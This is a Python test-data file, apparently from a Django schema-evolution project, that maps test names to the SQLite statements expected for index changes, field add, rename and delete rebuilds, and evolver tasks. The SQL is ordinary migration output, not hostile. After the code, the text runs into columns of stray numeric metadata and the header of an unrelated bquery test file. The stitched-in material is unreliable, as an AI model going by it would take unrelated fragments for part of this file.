            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'replace_list': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "char_field1" varchar(20) NOT NULL,'
            ' "char_field2" varchar(40) NOT NULL,'
            ' CONSTRAINT "new_check_constraint"'
            ' CHECK ("char_field1" LIKE \'test%\' ESCAPE \'\\\'),'
            ' CONSTRAINT "new_unique_constraint_plain"'
            ' UNIQUE ("int_field1", "char_field1"));',
            'INSERT INTO "TEMP_TABLE"'
            ' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
            ' SELECT "id", "int_field1", "int_field2", "char_field1",'
            ' "char_field2" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'setting_from_empty': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "char_field1" varchar(20) NOT NULL,'
            ' "char_field2" varchar(40) NOT NULL,'
            ' CONSTRAINT "new_check_constraint"'
            ' CHECK ("char_field1" LIKE \'test%\' ESCAPE \'\\\'),'
            ' CONSTRAINT "new_unique_constraint_plain"'
            ' UNIQUE ("int_field1", "int_field2"));',
            'INSERT INTO "TEMP_TABLE"'
            ' ("id", "int_field1", "int_field2", "char_field1", "char_field2")'
            ' SELECT "id", "int_field1", "int_field2", "char_field1",'
            ' "char_field2" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
    }
def indexes(connection):
    """SQL test statements for the ChangeMetaIndexesTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    # Meta.indexes entries use yet another naming scheme, hence
    # model_meta_indexes=True below.  Named indexes (my_custom_index)
    # keep their explicit name.
    generate_index_name = make_generate_index_name(connection)

    return {
        'replace_list': [
            'DROP INDEX "%s";'
            % generate_index_name('tests_testmodel', ['int_field1'],
                                  model_meta_indexes=True),
            'DROP INDEX "my_custom_index";',
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field2");'
            % generate_index_name('tests_testmodel', ['int_field2'],
                                  model_meta_indexes=True),
        ],
        'append_list': [
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field2");'
            % generate_index_name('tests_testmodel', ['int_field2'],
                                  model_meta_indexes=True),
        ],
        'removing': [
            'DROP INDEX "%s";'
            % generate_index_name('tests_testmodel', ['int_field1'],
                                  model_meta_indexes=True),
            'DROP INDEX "my_custom_index";',
        ],
        'ignore_missing_indexes': [
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field2");'
            % generate_index_name('tests_testmodel', ['int_field2'],
                                  model_meta_indexes=True),
        ],
        'setting_from_empty': [
            'CREATE INDEX "%s"'
            ' ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel',
                                  ['int_field1'],
                                  model_meta_indexes=True),
            # NOTE(review): DESC is a module-level constant not visible in
            # this chunk -- presumably ' DESC' or '' depending on whether
            # the backend/Django version supports index ordering; confirm
            # against the file header.
            'CREATE INDEX "my_custom_index"'
            ' ON "tests_testmodel" ("char_field1", "char_field2"%s);'
            % DESC,
        ],
    }
def preprocessing(connection):
    """SQL test statements for the PreprocessingTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    generate_index_name = make_generate_index_name(connection)

    # Most mutations are expressed as a table rebuild: CREATE TEMP_TABLE,
    # INSERT ... SELECT (with literal defaults for added columns), DROP
    # the old table, then RENAME.  Chained mutations that cancel out
    # (e.g. add+delete) collapse accordingly.
    mappings = {
        'add_change_field': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "added_field" varchar(50) NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
            ' "added_field")'
            ' SELECT "my_id", "char_field", \'bar\' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'add_change_rename_field': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "renamed_field" varchar(50) NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
            ' "renamed_field")'
            ' SELECT "my_id", "char_field", \'bar\' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'add_delete_add_field': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "added_field" integer NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
            ' "added_field")'
            ' SELECT "my_id", "char_field", 42 FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'add_delete_add_rename_field': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "renamed_field" integer NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
            ' "renamed_field")'
            ' SELECT "my_id", "char_field", 42 FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'add_rename_change_field': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "renamed_field" varchar(50) NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
            ' "renamed_field")'
            ' SELECT "my_id", "char_field", \'bar\' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'add_rename_change_rename_change_field': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "renamed_field" varchar(50) NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
            ' "renamed_field")'
            ' SELECT "my_id", "char_field", \'foo\' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        # The added column is NULL with no default, so it isn't listed in
        # the INSERT at all.
        'add_rename_field_with_db_column': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "added_field" varchar(50) NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
            ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'add_field_rename_model': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "added_field_id" integer NULL'
            ' REFERENCES "tests_reffedpreprocmodel" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
            ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("added_field_id");'
            % generate_index_name('tests_testmodel', 'added_field_id',
                                  'added_field'),
        ],
        'add_rename_field_rename_model': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "renamed_field_id" integer NULL'
            ' REFERENCES "tests_reffedpreprocmodel" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
            ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("renamed_field_id");'
            % generate_index_name('tests_testmodel', 'renamed_field_id',
                                  'renamed_field'),
        ],
        # Two rebuilds: one adding the column (SQL mutation in between),
        # one deleting it again.
        'add_sql_delete': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "added_field" varchar(20) NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field",'
            ' "added_field")'
            ' SELECT "my_id", "char_field", \'foo\' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
            ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'delete_char_field': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY);',
            'INSERT INTO "TEMP_TABLE" ("my_id")'
            ' SELECT "my_id" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        # Rename followed by delete collapses to dropping the original.
        'rename_delete_model': [
            'DROP TABLE "tests_testmodel";',
        ],
        'noop': [],
    }

    if sqlite_version >= (3, 26):
        # Newer SQLite: column renames are expressed with
        # ALTER TABLE ... RENAME COLUMN, avoiding one table rebuild.
        mappings.update({
            'change_rename_field': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "char_field" TO "renamed_field";',
            ],
            'change_rename_change_rename_field': [
                # Change char_field to length of 30 and allow NULL.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(30) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                # Rename char_field to renamed_field.
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "char_field" TO "renamed_field";',
            ],
            'rename_add_field': [
                # Rename char_field to renamed_field.
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "char_field" TO "renamed_field";',
                # Remove NULL from renamed_field.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(20) NOT NULL,'
                ' "char_field" varchar(50) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
            'rename_change_rename_change_field': [
                # Rename char_field to renamed_field.
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "char_field" TO "renamed_field";',
                # Set renamed_field to allow NULL and set length to 50.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(50) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
            'rename_rename_field': [
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "char_field" TO "renamed_field";',
            ],
        })
    else:
        # Older SQLite: column renames also require a full table rebuild.
        mappings.update({
            'change_rename_field': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(20) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(20) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
            'change_rename_change_rename_field': [
                # Change char_field to length of 30 and allow NULL.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "char_field" varchar(30) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "char_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                # Rename char_field to renamed_field.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(30) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
            'rename_add_field': [
                # Rename char_field to renamed_field.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(20) NOT NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                # Remove NULL from renamed_field.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(20) NOT NULL,'
                ' "char_field" varchar(50) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
            'rename_change_rename_change_field': [
                # Rename char_field to renamed_field.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(20) NOT NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                # Set renamed_field to allow NULL and set length to 50.
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(50) NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "renamed_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
            'rename_rename_field': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "renamed_field" varchar(20) NOT NULL);',
                'INSERT INTO "TEMP_TABLE" ("my_id", "renamed_field")'
                ' SELECT "my_id", "char_field" FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            ],
        })

    return mappings
def evolver(connection):
    """SQL test statements for the EvolverTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    generate_index_name = make_generate_index_name(connection)

    mappings = {
        'complex_deps_new_db_new_models': [
            'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel"'
            ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
            ' "char_field" varchar(10) NOT NULL,'
            ' "fkey_id" integer NULL'
            ' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2"'
            ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
            ' "fkey_id" integer NULL'
            ' REFERENCES "evolutions_app2_evolutionsapp2testmodel" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED,'
            ' "int_field" integer NOT NULL);',
            'CREATE TABLE "evolutions_app_evolutionsapptestmodel"'
            ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
            ' "char_field" varchar(10) NULL,'
            ' "char_field2" varchar(20) NULL);',
            'CREATE INDEX "%s" ON "evolutions_app2_evolutionsapp2testmodel"'
            ' ("fkey_id");'
            % generate_index_name('evolutions_app2_evolutionsapp2testmodel',
                                  'fkey_id', 'fkey'),
            'CREATE INDEX "%s" ON "evolutions_app2_evolutionsapp2testmodel2"'
            ' ("fkey_id");'
            % generate_index_name('evolutions_app2_evolutionsapp2testmodel2',
                                  'fkey_id', 'fkey'),
        ],
        # Upgrades are expressed as table rebuilds (temp table, copy,
        # drop, rename), plus index recreation where an FK is involved.
        'complex_deps_upgrade_task_1': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(10) NULL,'
            ' "char_field2" varchar(20) NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "char_field2")'
            ' SELECT "id", "char_field", "char_field2"'
            ' FROM "evolutions_app_evolutionsapptestmodel";',
            'DROP TABLE "evolutions_app_evolutionsapptestmodel";',
            'ALTER TABLE "TEMP_TABLE"'
            ' RENAME TO "evolutions_app_evolutionsapptestmodel";',
        ],
        'complex_deps_upgrade_task_2': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(10) NOT NULL,'
            ' "fkey_id" integer NULL'
            ' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field")'
            ' SELECT "id", "char_field"'
            ' FROM "evolutions_app2_evolutionsapp2testmodel";',
            'DROP TABLE "evolutions_app2_evolutionsapp2testmodel";',
            'ALTER TABLE "TEMP_TABLE"'
            ' RENAME TO "evolutions_app2_evolutionsapp2testmodel";',
            'CREATE INDEX "%s" ON "evolutions_app2_evolutionsapp2testmodel"'
            ' ("fkey_id");'
            % generate_index_name('evolutions_app2_evolutionsapp2testmodel',
                                  'fkey_id', 'fkey'),
        ],
        'evolve_app_task': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "value" varchar(100) NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "value")'
            ' SELECT "id", "value" FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'purge_app_task': [
            'DROP TABLE "tests_testmodel";',
        ],
    }

    if django_version >= (1, 7):
        # Django >= 1.7 emits one complete statement per table.
        mappings.update({
            'create_table': [
                'CREATE TABLE "tests_testmodel" '
                '("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "value" varchar(100) NOT NULL);',
            ],
        })
    else:
        # Django < 1.7 emits CREATE TABLE as multiple SQL fragments.
        mappings.update({
            'create_table': [
                'CREATE TABLE "tests_testmodel" (',
                '    "id" integer NOT NULL PRIMARY KEY,',
                '    "value" varchar(100) NOT NULL',
                ')',
                ';',
            ],
        })

    if django_version >= (2, 0):
        # Django >= 2.0: FK references include
        # DEFERRABLE INITIALLY DEFERRED.
        mappings.update({
            'complex_deps_new_db_new_models': [
                'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel"'
                ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "char_field" varchar(10) NOT NULL,'
                ' "fkey_id" integer NULL'
                ' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2"'
                ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "fkey_id" integer NULL'
                ' REFERENCES "evolutions_app2_evolutionsapp2testmodel" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED,'
                ' "int_field" integer NOT NULL);',
                'CREATE TABLE "evolutions_app_evolutionsapptestmodel"'
                ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "char_field" varchar(10) NULL,'
                ' "char_field2" varchar(20) NULL);',
                'CREATE INDEX "%s"'
                ' ON "evolutions_app2_evolutionsapp2testmodel" ("fkey_id");'
                % generate_index_name(
                    'evolutions_app2_evolutionsapp2testmodel',
                    'fkey_id',
                    'fkey'),
                'CREATE INDEX "%s"'
                ' ON "evolutions_app2_evolutionsapp2testmodel2" ("fkey_id");'
                % generate_index_name(
                    'evolutions_app2_evolutionsapp2testmodel2',
                    'fkey_id',
                    'fkey'),
            ],
            'create_tables_with_deferred_refs': [
                'CREATE TABLE "tests_testmodel" '
                '("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "value" varchar(100) NOT NULL,'
                ' "ref_id" integer NOT NULL'
                ' REFERENCES "evolutions_app_reffedevolvertestmodel" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED);',
                'CREATE TABLE "evolutions_app_reffedevolvertestmodel" '
                '("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "value" varchar(100) NOT NULL);',
                'CREATE INDEX "%s" ON "tests_testmodel" ("ref_id");'
                % generate_index_name('tests_testmodel', 'ref_id'),
            ],
        })
    elif django_version >= (1, 7):
        # Django 1.7-1.x: same structure, but FK references are emitted
        # without DEFERRABLE INITIALLY DEFERRED.
        mappings.update({
            'complex_deps_new_db_new_models': [
                'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel"'
                ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "char_field" varchar(10) NOT NULL,'
                ' "fkey_id" integer NULL'
                ' REFERENCES "evolutions_app_evolutionsapptestmodel" ("id"));',
                'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2"'
                ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "fkey_id" integer NULL'
                ' REFERENCES "evolutions_app2_evolutionsapp2testmodel" ("id"),'
                ' "int_field" integer NOT NULL);',
                'CREATE TABLE "evolutions_app_evolutionsapptestmodel"'
                ' ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "char_field" varchar(10) NULL,'
                ' "char_field2" varchar(20) NULL);',
                'CREATE INDEX "%s"'
                ' ON "evolutions_app2_evolutionsapp2testmodel" ("fkey_id");'
                % generate_index_name(
                    'evolutions_app2_evolutionsapp2testmodel',
                    'fkey_id',
                    'fkey'),
                'CREATE INDEX "%s"'
                ' ON "evolutions_app2_evolutionsapp2testmodel2" ("fkey_id");'
                % generate_index_name(
                    'evolutions_app2_evolutionsapp2testmodel2',
                    'fkey_id',
                    'fkey'),
            ],
            'create_tables_with_deferred_refs': [
                'CREATE TABLE "tests_testmodel" '
                '("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "value" varchar(100) NOT NULL,'
                ' "ref_id" integer NOT NULL'
                ' REFERENCES "evolutions_app_reffedevolvertestmodel" ("id"));',
                'CREATE TABLE "evolutions_app_reffedevolvertestmodel" '
                '("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT,'
                ' "value" varchar(100) NOT NULL);',
                'CREATE INDEX "%s" ON "tests_testmodel" ("ref_id");'
                % generate_index_name('tests_testmodel', 'ref_id'),
            ],
        })
    else:
        # Django < 1.7: CREATE TABLE is emitted as multiple SQL fragments
        # and inline REFERENCES clauses only where already resolvable.
        mappings.update({
            'complex_deps_new_db_new_models': [
                'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel" (',
                '    "id" integer NOT NULL PRIMARY KEY,',
                '    "char_field" varchar(10) NOT NULL,',
                '    "fkey_id" integer',
                ')',
                ';',
                'CREATE TABLE "evolutions_app2_evolutionsapp2testmodel2" (',
                '    "id" integer NOT NULL PRIMARY KEY,',
                '    "fkey_id" integer REFERENCES'
                ' "evolutions_app2_evolutionsapp2testmodel" ("id"),',
                '    "int_field" integer NOT NULL',
                ')',
                ';',
                'CREATE TABLE "evolutions_app_evolutionsapptestmodel" (',
                '    "id" integer NOT NULL PRIMARY KEY,',
                '    "char_field" varchar(10),',
                '    "char_field2" varchar(20)',
                ')',
                ';',
                'CREATE INDEX "%s"'
                ' ON "evolutions_app2_evolutionsapp2testmodel" ("fkey_id");'
                % generate_index_name(
                    'evolutions_app2_evolutionsapp2testmodel',
                    'fkey_id',
                    'fkey'),
                'CREATE INDEX "%s"'
                ' ON "evolutions_app2_evolutionsapp2testmodel2" ("fkey_id");'
                % generate_index_name(
                    'evolutions_app2_evolutionsapp2testmodel2',
                    'fkey_id',
                    'fkey'),
            ],
            'create_tables_with_deferred_refs': [
                'CREATE TABLE "tests_testmodel" (',
                '    "id" integer NOT NULL PRIMARY KEY,',
                '    "value" varchar(100) NOT NULL,',
                '    "ref_id" integer NOT NULL',
                ')',
                ';',
                'CREATE TABLE "evolutions_app_reffedevolvertestmodel" (',
                '    "id" integer NOT NULL PRIMARY KEY,',
                '    "value" varchar(100) NOT NULL',
                ')',
                ';',
                'CREATE INDEX "%s" ON "tests_testmodel" ("ref_id");'
                % generate_index_name('tests_testmodel', 'ref_id', 'ref'),
            ],
        })

    return mappings
| 39.081399
| 79
| 0.522915
| 11,088
| 116,189
| 5.162518
| 0.030393
| 0.114706
| 0.078509
| 0.042486
| 0.915552
| 0.905611
| 0.894763
| 0.879215
| 0.871842
| 0.863859
| 0
| 0.015381
| 0.354818
| 116,189
| 2,972
| 80
| 39.094549
| 0.748222
| 0.036191
| 0
| 0.857778
| 1
| 0
| 0.593034
| 0.087296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007111
| false
| 0
| 0.002222
| 0
| 0.016889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c99956bdac59c64bb241706d5f973287f4bfdbc4
| 34,158
|
py
|
Python
|
bquery/tests/test_ctable.py
|
simon-castano/bquery
|
84bc138681ced2a8fdf2d3add49e4a72f3f35ed4
|
[
"BSD-3-Clause"
] | 56
|
2015-01-08T15:35:13.000Z
|
2020-03-11T16:13:15.000Z
|
bquery/tests/test_ctable.py
|
simon-castano/bquery
|
84bc138681ced2a8fdf2d3add49e4a72f3f35ed4
|
[
"BSD-3-Clause"
] | 62
|
2015-01-03T15:57:13.000Z
|
2021-08-11T11:36:49.000Z
|
bquery/tests/test_ctable.py
|
simon-castano/bquery
|
84bc138681ced2a8fdf2d3add49e4a72f3f35ed4
|
[
"BSD-3-Clause"
] | 19
|
2015-01-03T11:49:13.000Z
|
2020-01-31T10:00:03.000Z
|
import os
import random
import itertools
import tempfile
import shutil
import math
import itertools as itt
from contextlib import contextmanager
import nose
import numpy as np
import bcolz as bz
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
from nose.tools import assert_list_equal
import bquery
class TestCtable(object):
@contextmanager
def on_disk_data_cleaner(self, data):
    """Yield an on-disk bquery ctable built from *data*, then clean up.

    The ctable is flushed and re-opened from disk before being handed
    to the caller; the temp directory is removed when the block exits
    normally.
    """
